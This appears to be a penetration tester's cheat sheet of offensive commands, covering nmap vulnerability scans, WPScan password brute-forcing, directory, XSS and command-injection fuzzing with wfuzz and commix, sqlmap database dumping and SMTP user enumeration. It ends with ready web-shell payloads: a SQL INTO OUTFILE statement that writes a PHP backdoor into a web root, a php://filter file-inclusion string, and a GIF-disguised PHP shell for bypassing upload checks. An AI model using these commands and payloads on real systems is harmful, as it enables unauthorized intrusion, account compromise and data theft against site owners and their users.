Notes
######################## | |
COMMON COMMANDS | |
######################## | |
------------------------------------------------------------ | |
NMAP | |
------------------------------------------------------------ | |
nmap -p- -sT -sV -A $IP | |
nmap -p- -sC -sV $IP --open | |
nmap -p- --script=vuln $IP | |
nmap --script http-methods --script-args http-methods.url-path='/website' <target> | |
nmap -p80,443 --script=http-methods <ip> --script-args http-methods.url-path='/directory/goes/here' | |
nmap -p 139,445 -sC --script=smb-enum-shares <IP> | |
------------------------------------------------------------ | |
Sed IP's | |
------------------------------------------------------------ | |
grep -oE '((1?[0-9][0-9]?|2[0-4][0-9]|25[0-5])\.){3}(1?[0-9][0-9]?|2[0-4][0-9]|25[0-5])' FILE | |
------------------------------------------------------------ | |
WPScan | |
------------------------------------------------------------ | |
wpscan --url $URL --disable-tls-checks --enumerate p --enumerate t --enumerate u | |
wpscan --url $URL --disable-tls-checks -U users -P /usr/share/wordlists/rockyou.txt | |
wpscan --url $URL --enumerate p --plugins-detection aggressive | |
------------------------------------------------------------ | |
NIKTO | |
------------------------------------------------------------ | |
nikto --host $IP -ssl -evasion 1 | |
------------------------------------------------------------ | |
DNSrecon | |
------------------------------------------------------------ | |
dnsrecon -d yourdomain.com
------------------------------------------------------------ | |
Gobuster | |
------------------------------------------------------------ | |
gobuster dir -u $URL -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt -l -k -t 30 | |
gobuster dir -u $URL -w /opt/SecLists/Discovery/Web-Content/raft-medium-files.txt -l -k -t 30 | |
gobuster dns -d domain.org -w /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 30 | |
------------------------------------------------------------ | |
Extract IPs from text file | |
------------------------------------------------------------ | |
grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' nmapfile.txt | |
------------------------------------------------------------ | |
Wfuzz | |
------------------------------------------------------------ | |
Wfuzz XSS Fuzzing | |
------------------------------------------------------------ | |
wfuzz -c -z file,/opt/SecLists/Fuzzing/XSS/XSS-BruteLogic.txt "$URL" | |
wfuzz -c -z file,/opt/SecLists/Fuzzing/XSS/XSS-Jhaddix.txt "$URL" | |
------------------------------------------------------------ | |
COMMAND INJECTION WITH POST DATA | |
------------------------------------------------------------ | |
wfuzz -c -z file,/opt/SecLists/Fuzzing/command-injection-commix.txt -d "doi=FUZZ" "$URL" | |
------------------------------------------------------------ | |
Test for Parameter Existence
------------------------------------------------------------ | |
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/burp-parameter-names.txt "$URL" | |
------------------------------------------------------------ | |
AUTHENTICATED FUZZING DIRECTORIES | |
------------------------------------------------------------ | |
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt --hc 404 -d "SESSIONID=value" "$URL" | |
------------------------------------------------------------ | |
AUTHENTICATED FILE FUZZING: | |
------------------------------------------------------------ | |
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-medium-files.txt --hc 404 -d "SESSIONID=value" "$URL" | |
------------------------------------------------------------ | |
FUZZ Directories | |
------------------------------------------------------------ | |
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-large-directories.txt --hc 404 "$URL" | |
------------------------------------------------------------ | |
FUZZ FILES | |
------------------------------------------------------------ | |
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-large-files.txt --hc 404 "$URL" | |
------------------------------------------------------------ | |
LARGE WORDS | |
------------------------------------------------------------ | |
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-large-words.txt --hc 404 "$URL" | |
------------------------------------------------------------ | |
Users | |
------------------------------------------------------------ | |
wfuzz -c -z file,/opt/SecLists/Usernames/top-usernames-shortlist.txt --hc 404,403 "$URL" | |
------------------------------------------------------------ | |
Command Injection with commix, ssl, waf, random agent | |
------------------------------------------------------------ | |
commix --url="https://supermegaleetultradomain.com?parameter=" --level=3 --force-ssl --skip-waf --random-agent | |
------------------------------------------------------------ | |
SQLmap | |
------------------------------------------------------------ | |
sqlmap -u $URL --threads=2 --time-sec=10 --level=2 --risk=2 --technique=T --force-ssl | |
sqlmap -u $URL --threads=2 --time-sec=10 --level=4 --risk=3 --dump | |
------------------------------------------------------------ | |
theHarvester
------------------------------------------------------------ | |
theharvester -d domain.org -l 500 -b google | |
------------------------------------------------------------ | |
SMTP Enumeration | |
------------------------------------------------------------ | |
smtp-user-enum -M VRFY -U /opt/SecLists/Usernames/xato-net-10-million-usernames.txt -t $IP | |
smtp-user-enum -M EXPN -U /opt/SecLists/Usernames/xato-net-10-million-usernames.txt -t $IP | |
smtp-user-enum -M RCPT -U /opt/SecLists/Usernames/xato-net-10-million-usernames.txt -t $IP | |
smtp-user-enum -M EXPN -U /opt/SecLists/Usernames/xato-net-10-million-usernames.txt -t $IP | |
------------------------------------------------------------ | |
TCP Monitor | |
------------------------------------------------------------ | |
tcpdump -i any -c5 icmp | |
------------------------------------------------------------ | |
Netdiscover
------------------------------------------------------------ | |
netdiscover -r 0.0.0.0/24
------------------------------------------------------------ | |
INTO OUTFILE Door | |
------------------------------------------------------------ | |
SELECT “<?php system($_GET[‘cmd’]); ?>” into outfile “/var/www/WEROOT/backdoor.php”; | |
------------------------------------------------------------ | |
LFI? => PHP Filter Checks | |
------------------------------------------------------------ | |
php://filter/convert.base64-encode/resource= | |
------------------------------------------------------------ | |
UPLOAD IMAGE? | |
------------------------------------------------------------ | |
"GIF89a1 | |
<?php system($_POST[""cmd""]); ?>" | |
------------------------------------------------------------ |